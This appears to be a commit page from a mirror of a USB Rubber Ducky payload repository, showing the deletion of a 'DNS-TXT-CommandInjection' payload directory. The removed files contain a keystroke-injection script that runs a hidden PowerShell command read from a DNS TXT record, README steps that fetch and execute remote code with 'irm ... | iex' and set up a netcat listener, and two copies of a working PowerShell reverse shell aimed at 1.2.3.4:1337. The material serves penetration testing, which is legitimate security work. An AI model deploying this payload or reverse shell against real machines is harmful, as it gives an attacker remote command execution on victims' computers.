hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Delete payloads/library/execution/DNS-TXT-CommandInjection directory 

deleting and removing files from requested changes in Pull request
pull/468/head
Nate 2024-08-04 14:29:33 -05:00 committed by GitHub
parent 1fd0843049
commit c8e0ac280b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
6 changed files with 0 additions and 275 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

175
payloads/library/execution/DNS-TXT-CommandInjection/.gitignore vendored
View File

@ -1,175 +0,0 @@
# VSCode
.vscode/*
!.vscode/settings.json
!.vscode/tasks.json
!.vscode/launch.json
!.vscode/extensions.json
*.code-workspace
# Local History for <a href="https://www.jcchouinard.com/python-with-vscode/">Visual Studio Code</a>
.history/
# Common credential files
**/credentials.json
**/client_secrets.json
**/client_secret.json
*creds*
*.dat
*password*
*.httr-oauth*
# Private Node Modules
node_modules/
creds.js
# Private Files
*.json
*.csv
*.csv.gz
*.tsv
*.tsv.gz
*.xlsx
# Mac/OSX
.DS_Store
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
# C extensions
*.so
# Distribution / packaging
.Python
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
# PyInstaller
# Usually these files are written by a <a href="https://www.jcchouinard.com/learn-python/">python</a> script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
.hypothesis/
.pytest_cache/
cover/
# Translations
*.mo
*.pot
# Django stuff:
*.log
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# Scrapy stuff:
.scrapy
# Sphinx documentation
docs/_build/
# PyBuilder
.pybuilder/
target/
# <a href="https://www.jcchouinard.com/how-to-use-jupyter-notebook/">Jupyter Notebook</a>
.ipynb_checkpoints
# IPython
profile_default/
ipython_config.py
# pyenv
# For a library or package, you might want to ignore these files since the code is
# intended to run in multiple environments; otherwise, check them in:
# .python-version
# pipenv
# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in <a href="https://www.jcchouinard.com/version-control/">version control.</a>
# However, in case of collaboration, if having platform-specific dependencies or dependencies
# having no cross-platform support, pipenv may install dependencies that don't work, or not
# install all needed dependencies.
#Pipfile.lock
# PEP 582; used by e.g. github.com/David-OConnor/pyflow
__pypackages__/
# Celery stuff
celerybeat-schedule
celerybeat.pid
# SageMath parsed files
*.sage.py
# Environments
.env
.venv
env/
venv/
ENV/
env.bak/
venv.bak/
# <a href="https://www.jcchouinard.com/python-with-spyder-ide/">Spyder</a> project settings
.spyderproject
.spyproject
# Rope project settings
.ropeproject
# mkdocs documentation
/site
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
# pytype static type analyzer
.pytype/
# Cython debug symbols
cython_debug/

3
payloads/library/execution/DNS-TXT-CommandInjection/ConvertBase64.ps1
View File

@ -1,3 +0,0 @@
$text = Read-Host -prompt "What would you like to encode"
$base64Text = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($text))
echo $base64Text

38
payloads/library/execution/DNS-TXT-CommandInjection/DNS-TXT-CommandInjection.txt
View File

@ -1,38 +0,0 @@
REM Title: DNS-TXT-CommandInjection
REM Author: Nate
REM Description: A usb rubber ducky payload that leverages DNS TXT records to perform command injection.
REM Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with
REM the base64 encoded payload you have. See README.md for more details on converting your payload to base64
REM and an example of creating your DNS TXT record in AWS Route53 service.
REM Target: Windows 10, 11
REM Props: Hak5, Darren Kitchen, Korben
REM Version: 1.0
REM Category: Execution
REM CONFIGURATION
REM REQUIRED A domain with the ability to manipulate the DNS TXT records.
REM REQUIRED Web Server hosting the payload. In this example, python3 http.server was used to host a
REM reverseshell.
REM REQUIRED A listener for incoming connections like netcat.
REM REQUIRED - Provide URL used for Example
DEFINE #MY_TARGET_URL example.com
REM Example: powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
REM Example of Decoded payload: "irm http://MY_TARGET_URL/T1.txt | iex"
REM NOTES: No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex"
REM for the STRING payload below. Examples of the decoded command and encoded command are shown below to put
REM into DNS TXT record.
REM Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
REM Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
REM ShoutOut: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.
REM https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
REM The link below has the Powershell script to convert your payloads to Base64.
REM https://github.com/nathansb2022/usbrubberducky-payloads/blob/master/payloads/library/execution/DNS-TXT-CommandInjection/ConvertBase64.ps1
DELAY 1000
GUI r
DELAY 1000
STRING powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
DELAY 500
ENTER

49
payloads/library/execution/DNS-TXT-CommandInjection/README.md
View File

@ -1,49 +0,0 @@
# DNS-TXT-CommandInjection
Ducky Script uses Resolve-DnsName to perform a DNS name query resolution for a domain hosting a malicious TXT record.
## Description
A usb rubber ducky payload that leverages DNS TXT records to perform command injection. Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with the base64 encoded payload you have. See link below for an example of creating your DNS TXT record in AWS Route53 service.
## Requirements
A domain with the ability to manipulate the DNS TXT records.
Web Server hosting the payload. In this example, python3 http.server was used to host a reverseshell.
A listener for incoming connections like netcat.
Provide URL used for Example
DEFINE #MY_TARGET_URL example.com
## Notes
No base64 can be used as an option by replacing "$a=",";powershell -e $a" with just "|iex" for the STRING payload below. Examples of the decoded command and encoded command are shown below to put into DNS TXT record.
Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
powershellReverseShellOne-liner.ps1 is identical to T1.txt. (file name shortened due to character limitations)
## Windows Commands (used in payload)
### Execute DNS TXT Payload
```Powershell
powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
```
### Execute web hosted Powershell Reverseshell
```Powershell
irm http://MY_TARGET_URL/T1.txt | iex
```
### [Powershell Reverseshell One-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)
```Powershell
.\powershellReverseShellOne-liner.ps1
```
### Convert payload to base64
```Powershell
.\convertBase64.ps1
```
### Alternative to executing Powershell Script
```Powershell
gc -raw .\convertBase64.ps1 | iex
```
## Linux Commands
```bash
nc -lvnp 1337
```
### Links
[Powershell Reverseshell One-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)
[Convert to base64](https://github.com/nathansb2022/usbrubberducky-payloads/blob/master/payloads/library/execution/DNS-TXT-CommandInjection/ConvertBase64.ps1)
[Create TXT record in AWS Route53](https://www.entrust.com/knowledgebase/ssl/how-to-create-a-txt-record-on-amazon-aws-route-53-for-entrust-email-validation-method)

5
payloads/library/execution/DNS-TXT-CommandInjection/T1.txt
View File

@ -1,5 +0,0 @@
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
# CONFIGURATION
# REQUIRED - Provide IP and Port used for Example
# DEFINE #MY_TARGET_IP and Port after TCPClient(
$client = New-Object System.Net.Sockets.TCPClient('1.2.3.4',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

5
payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-liner.ps1
View File

@ -1,5 +0,0 @@
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
# CONFIGURATION
# REQUIRED - Provide IP and Port used for Example
# DEFINE #MY_TARGET_IP and Port after TCPClient(
$client = New-Object System.Net.Sockets.TCPClient('1.2.3.4',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()